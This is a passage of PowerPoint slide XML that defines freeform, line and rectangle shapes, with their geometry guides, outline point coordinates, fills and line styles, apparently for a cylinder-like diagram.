              <a:gd name="T46" fmla="*/ 2147483647 w 403"/>
              <a:gd name="T47" fmla="*/ 2147483647 h 77"/>
              <a:gd name="T48" fmla="*/ 2147483647 w 403"/>
              <a:gd name="T49" fmla="*/ 2147483647 h 77"/>
              <a:gd name="T50" fmla="*/ 2147483647 w 403"/>
              <a:gd name="T51" fmla="*/ 2147483647 h 77"/>
              <a:gd name="T52" fmla="*/ 2147483647 w 403"/>
              <a:gd name="T53" fmla="*/ 2147483647 h 77"/>
              <a:gd name="T54" fmla="*/ 2147483647 w 403"/>
              <a:gd name="T55" fmla="*/ 2147483647 h 77"/>
              <a:gd name="T56" fmla="*/ 2147483647 w 403"/>
              <a:gd name="T57" fmla="*/ 2147483647 h 77"/>
              <a:gd name="T58" fmla="*/ 2147483647 w 403"/>
              <a:gd name="T59" fmla="*/ 2147483647 h 77"/>
              <a:gd name="T60" fmla="*/ 2147483647 w 403"/>
              <a:gd name="T61" fmla="*/ 2147483647 h 77"/>
              <a:gd name="T62" fmla="*/ 2147483647 w 403"/>
              <a:gd name="T63" fmla="*/ 2147483647 h 77"/>
              <a:gd name="T64" fmla="*/ 2147483647 w 403"/>
              <a:gd name="T65" fmla="*/ 2147483647 h 77"/>
              <a:gd name="T66" fmla="*/ 2147483647 w 403"/>
              <a:gd name="T67" fmla="*/ 2147483647 h 77"/>
              <a:gd name="T68" fmla="*/ 2147483647 w 403"/>
              <a:gd name="T69" fmla="*/ 2147483647 h 77"/>
              <a:gd name="T70" fmla="*/ 2147483647 w 403"/>
              <a:gd name="T71" fmla="*/ 2147483647 h 77"/>
              <a:gd name="T72" fmla="*/ 2147483647 w 403"/>
              <a:gd name="T73" fmla="*/ 2147483647 h 77"/>
              <a:gd name="T74" fmla="*/ 2147483647 w 403"/>
              <a:gd name="T75" fmla="*/ 2147483647 h 77"/>
              <a:gd name="T76" fmla="*/ 2147483647 w 403"/>
              <a:gd name="T77" fmla="*/ 2147483647 h 77"/>
              <a:gd name="T78" fmla="*/ 2147483647 w 403"/>
              <a:gd name="T79" fmla="*/ 2147483647 h 77"/>
              <a:gd name="T80" fmla="*/ 2147483647 w 403"/>
              <a:gd name="T81" fmla="*/ 2147483647 h 77"/>
              <a:gd name="T82" fmla="*/ 2147483647 w 403"/>
              <a:gd name="T83" fmla="*/ 2147483647 h 77"/>
              <a:gd name="T84" fmla="*/ 2147483647 w 403"/>
              <a:gd name="T85" fmla="*/ 2147483647 h 77"/>
              <a:gd name="T86" fmla="*/ 2147483647 w 403"/>
              <a:gd name="T87" fmla="*/ 2147483647 h 77"/>
              <a:gd name="T88" fmla="*/ 2147483647 w 403"/>
              <a:gd name="T89" fmla="*/ 2147483647 h 77"/>
              <a:gd name="T90" fmla="*/ 2147483647 w 403"/>
              <a:gd name="T91" fmla="*/ 2147483647 h 77"/>
              <a:gd name="T92" fmla="*/ 2147483647 w 403"/>
              <a:gd name="T93" fmla="*/ 2147483647 h 77"/>
              <a:gd name="T94" fmla="*/ 2147483647 w 403"/>
              <a:gd name="T95" fmla="*/ 2147483647 h 77"/>
              <a:gd name="T96" fmla="*/ 2147483647 w 403"/>
              <a:gd name="T97" fmla="*/ 2147483647 h 77"/>
              <a:gd name="T98" fmla="*/ 2147483647 w 403"/>
              <a:gd name="T99" fmla="*/ 2147483647 h 77"/>
              <a:gd name="T100" fmla="*/ 2147483647 w 403"/>
              <a:gd name="T101" fmla="*/ 2147483647 h 77"/>
              <a:gd name="T102" fmla="*/ 2147483647 w 403"/>
              <a:gd name="T103" fmla="*/ 0 h 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3"/>
              <a:gd name="T157" fmla="*/ 0 h 77"/>
              <a:gd name="T158" fmla="*/ 403 w 403"/>
              <a:gd name="T159" fmla="*/ 77 h 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3" h="77">
                <a:moveTo>
                  <a:pt x="202" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="181" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="161" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="142" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="123" y="3"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="106" y="5"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="88" y="6"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="81" y="7"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="73" y="8"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="66" y="10"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="59" y="11"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="52" y="13"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="46" y="14"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="40" y="15"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="35" y="17"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="29" y="19"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="24" y="20"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19" y="22"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16" y="24"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12" y="26"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9" y="27"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="29"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="31"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="33"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="35"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="36"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="39"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="41"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="42"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="45"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="47"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="48"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9" y="51"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12" y="52"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16" y="54"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19" y="55"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="24" y="58"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="29" y="59"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="35" y="61"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="40" y="62"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="46" y="63"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="52" y="65"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="59" y="67"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="66" y="68"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="73" y="69"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="81" y="70"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="88" y="72"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="106" y="73"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="123" y="75"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="142" y="76"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="161" y="77"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="181" y="77"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="202" y="77"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="223" y="77"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="242" y="77"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="261" y="76"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="280" y="75"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="297" y="73"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="315" y="72"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="322" y="70"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="330" y="69"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="337" y="68"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="344" y="67"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="351" y="65"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="357" y="63"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="363" y="62"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="368" y="61"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="374" y="59"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="379" y="58"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="384" y="55"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="387" y="54"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="391" y="52"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="394" y="51"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="396" y="48"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="399" y="47"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="401" y="45"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="402" y="42"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="402" y="41"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="403" y="39"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="402" y="36"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="402" y="35"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="401" y="33"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="399" y="31"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="396" y="29"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="394" y="27"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="391" y="26"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="387" y="24"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="384" y="22"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="379" y="20"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="374" y="19"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="368" y="17"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="363" y="15"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="357" y="14"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="351" y="13"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="344" y="11"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="337" y="10"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="330" y="8"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="322" y="7"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="315" y="6"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="297" y="5"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="280" y="3"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="261" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="242" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="223" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="202" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="14288">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="130046" tIns="65023" rIns="130046" bIns="65023"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10315" name="Line 396"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4119562" y="7278688"/>
            <a:ext cx="1588" cy="107950"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="14288">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="130046" tIns="65023" rIns="130046" bIns="65023"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10316" name="Line 397"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5029200" y="7278688"/>
            <a:ext cx="1587" cy="107950"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="14288">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="130046" tIns="65023" rIns="130046" bIns="65023"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10317" name="Rectangle 398"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4119562" y="7278688"/>
            <a:ext cx="903288" cy="107950"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="CCCCFF"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:no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318" name="Rectangle 399"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4649787" y="7318375"/>
            <a:ext cx="0" cy="277813"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US">
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10319" name="Freeform 400"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4110037" y="7151688"/>
            <a:ext cx="912813" cy="206375"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 2147483647 w 404"/>
              <a:gd name="T1" fmla="*/ 0 h 91"/>
              <a:gd name="T2" fmla="*/ 2147483647 w 404"/>
              <a:gd name="T3" fmla="*/ 2147483647 h 91"/>
              <a:gd name="T4" fmla="*/ 2147483647 w 404"/>
              <a:gd name="T5" fmla="*/ 2147483647 h 91"/>
              <a:gd name="T6" fmla="*/ 2147483647 w 404"/>
              <a:gd name="T7" fmla="*/ 2147483647 h 91"/>
              <a:gd name="T8" fmla="*/ 2147483647 w 404"/>
              <a:gd name="T9" fmla="*/ 2147483647 h 91"/>
              <a:gd name="T10" fmla="*/ 2147483647 w 404"/>
              <a:gd name="T11" fmla="*/ 2147483647 h 91"/>
              <a:gd name="T12" fmla="*/ 2147483647 w 404"/>
              <a:gd name="T13" fmla="*/ 2147483647 h 91"/>
              <a:gd name="T14" fmla="*/ 2147483647 w 404"/>
              <a:gd name="T15" fmla="*/ 2147483647 h 91"/>
              <a:gd name="T16" fmla="*/ 2147483647 w 404"/>
              <a:gd name="T17" fmla="*/ 2147483647 h 91"/>
              <a:gd name="T18" fmla="*/ 2147483647 w 404"/>
              <a:gd name="T19" fmla="*/ 2147483647 h 91"/>
              <a:gd name="T20" fmla="*/ 2147483647 w 404"/>
              <a:gd name="T21" fmla="*/ 2147483647 h 91"/>
              <a:gd name="T22" fmla="*/ 2147483647 w 404"/>
              <a:gd name="T23" fmla="*/ 2147483647 h 91"/>
              <a:gd name="T24" fmla="*/ 0 w 404"/>
              <a:gd name="T25" fmla="*/ 2147483647 h 91"/>
              <a:gd name="T26" fmla="*/ 0 w 404"/>
              <a:gd name="T27" fmla="*/ 2147483647 h 91"/>
              <a:gd name="T28" fmla="*/ 2147483647 w 404"/>
              <a:gd name="T29" fmla="*/ 2147483647 h 91"/>
              <a:gd name="T30" fmla="*/ 2147483647 w 404"/>
              <a:gd name="T31" fmla="*/ 2147483647 h 91"/>
              <a:gd name="T32" fmla="*/ 2147483647 w 404"/>
              <a:gd name="T33" fmla="*/ 2147483647 h 91"/>
              <a:gd name="T34" fmla="*/ 2147483647 w 404"/>
              <a:gd name="T35" fmla="*/ 2147483647 h 91"/>
              <a:gd name="T36" fmla="*/ 2147483647 w 404"/>
              <a:gd name="T37" fmla="*/ 2147483647 h 91"/>
              <a:gd name="T38" fmla="*/ 2147483647 w 404"/>
              <a:gd name="T39" fmla="*/ 2147483647 h 91"/>
              <a:gd name="T40" fmla="*/ 2147483647 w 404"/>
              <a:gd name="T41" fmla="*/ 2147483647 h 91"/>
              <a:gd name="T42" fmla="*/ 2147483647 w 404"/>
              <a:gd name="T43" fmla="*/ 2147483647 h 91"/>
              <a:gd name="T44" fmla="*/ 2147483647 w 404"/>
              <a:gd name="T45" fmla="*/ 2147483647 h 91"/>
              <a:gd name="T46" fmla="*/ 2147483647 w 404"/>
              <a:gd name="T47" fmla="*/ 2147483647 h 91"/>
              <a:gd name="T48" fmla="*/ 2147483647 w 404"/>
              <a:gd name="T49" fmla="*/ 2147483647 h 91"/>
              <a:gd name="T50" fmla="*/ 2147483647 w 404"/>
              <a:gd name="T51" fmla="*/ 2147483647 h 91"/>
              <a:gd name="T52" fmla="*/ 2147483647 w 404"/>
              <a:gd name="T53" fmla="*/ 2147483647 h 91"/>
              <a:gd name="T54" fmla="*/ 2147483647 w 404"/>
              <a:gd name="T55" fmla="*/ 2147483647 h 91"/>
              <a:gd name="T56" fmla="*/ 2147483647 w 404"/>
              <a:gd name="T57" fmla="*/ 2147483647 h 91"/>
              <a:gd name="T58" fmla="*/ 2147483647 w 404"/>
              <a:gd name="T59" fmla="*/ 2147483647 h 91"/>
              <a:gd name="T60" fmla="*/ 2147483647 w 404"/>
              <a:gd name="T61" fmla="*/ 2147483647 h 91"/>
              <a:gd name="T62" fmla="*/ 2147483647 w 404"/>
              <a:gd name="T63" fmla="*/ 2147483647 h 91"/>
              <a:gd name="T64" fmla="*/ 2147483647 w 404"/>
              <a:gd name="T65" fmla="*/ 2147483647 h 91"/>
              <a:gd name="T66" fmla="*/ 2147483647 w 404"/>
              <a:gd name="T67" fmla="*/ 2147483647 h 91"/>
              <a:gd name="T68" fmla="*/ 2147483647 w 404"/>
              <a:gd name="T69" fmla="*/ 2147483647 h 91"/>
              <a:gd name="T70" fmla="*/ 2147483647 w 404"/>
              <a:gd name="T71" fmla="*/ 2147483647 h 91"/>
              <a:gd name="T72" fmla="*/ 2147483647 w 404"/>
              <a:gd name="T73" fmla="*/ 2147483647 h 91"/>
              <a:gd name="T74" fmla="*/ 2147483647 w 404"/>
              <a:gd name="T75" fmla="*/ 2147483647 h 91"/>
              <a:gd name="T76" fmla="*/ 2147483647 w 404"/>
              <a:gd name="T77" fmla="*/ 2147483647 h 91"/>
              <a:gd name="T78" fmla="*/ 2147483647 w 404"/>
              <a:gd name="T79" fmla="*/ 2147483647 h 91"/>
              <a:gd name="T80" fmla="*/ 2147483647 w 404"/>
              <a:gd name="T81" fmla="*/ 2147483647 h 91"/>
              <a:gd name="T82" fmla="*/ 2147483647 w 404"/>
              <a:gd name="T83" fmla="*/ 2147483647 h 91"/>
              <a:gd name="T84" fmla="*/ 2147483647 w 404"/>
              <a:gd name="T85" fmla="*/ 2147483647 h 91"/>
              <a:gd name="T86" fmla="*/ 2147483647 w 404"/>
              <a:gd name="T87" fmla="*/ 2147483647 h 91"/>
              <a:gd name="T88" fmla="*/ 2147483647 w 404"/>
              <a:gd name="T89" fmla="*/ 2147483647 h 91"/>
              <a:gd name="T90" fmla="*/ 2147483647 w 404"/>
              <a:gd name="T91" fmla="*/ 2147483647 h 91"/>
              <a:gd name="T92" fmla="*/ 2147483647 w 404"/>
              <a:gd name="T93" fmla="*/ 2147483647 h 91"/>
              <a:gd name="T94" fmla="*/ 2147483647 w 404"/>
              <a:gd name="T95" fmla="*/ 2147483647 h 91"/>
              <a:gd name="T96" fmla="*/ 2147483647 w 404"/>
              <a:gd name="T97" fmla="*/ 2147483647 h 91"/>
              <a:gd name="T98" fmla="*/ 2147483647 w 404"/>
              <a:gd name="T99" fmla="*/ 2147483647 h 91"/>
              <a:gd name="T100" fmla="*/ 2147483647 w 404"/>
              <a:gd name="T101" fmla="*/ 2147483647 h 91"/>
              <a:gd name="T102" fmla="*/ 2147483647 w 404"/>
              <a:gd name="T103" fmla="*/ 0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4"/>
              <a:gd name="T157" fmla="*/ 0 h 91"/>
              <a:gd name="T158" fmla="*/ 404 w 404"/>
              <a:gd name="T159" fmla="*/ 91 h 9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4" h="91">
                <a:moveTo>
                  <a:pt x="202" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="181" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="161" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="143" y="3"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="124" y="4"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="106" y="6"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="89" y="8"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="82" y="10"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="74" y="11"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="67" y="12"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="60" y="13"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="53" y="15"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="47" y="17"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="41" y="19"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="35" y="20"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="29" y="22"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="25" y="24"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20" y="26"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16" y="28"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13" y="29"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9" y="32"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="34"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5" y="36"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="39"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="41"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="43"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="46"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="48"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="50"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="53"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5" y="55"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="57"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9" y="59"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13" y="61"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16" y="63"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20" y="66"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="25" y="67"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="29" y="69"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="35" y="71"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="41" y="73"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="47" y="75"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="53" y="76"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="60" y="77"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="67" y="80"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="74" y="81"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="82" y="82"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="89" y="83"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="106" y="85"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="124" y="88"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="143" y="89"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="161" y="90"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="181" y="91"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="202" y="91"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="223" y="91"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="243" y="90"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="262" y="89"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="280" y="88"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="298" y="85"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="315" y="83"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="322" y="82"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="330" y="81"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="337" y="80"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="344" y="77"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="351" y="76"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="357" y="75"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="363" y="73"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="369" y="71"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="375" y="69"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="379" y="67"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="384" y="66"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="388" y="63"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="391" y="61"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="395" y="59"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="397" y="57"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="399" y="55"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="402" y="53"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="403" y="50"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="404" y="48"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="404" y="46"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="404" y="43"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="403" y="41"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="402" y="39"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="399" y="36"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="397" y="34"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="395" y="32"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="391" y="29"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="388" y="28"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="384" y="26"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="379" y="24"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="375" y="22"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="369" y="20"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="363" y="19"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="357" y="17"/>
                </a:lnTo>
                <a:lnTo>
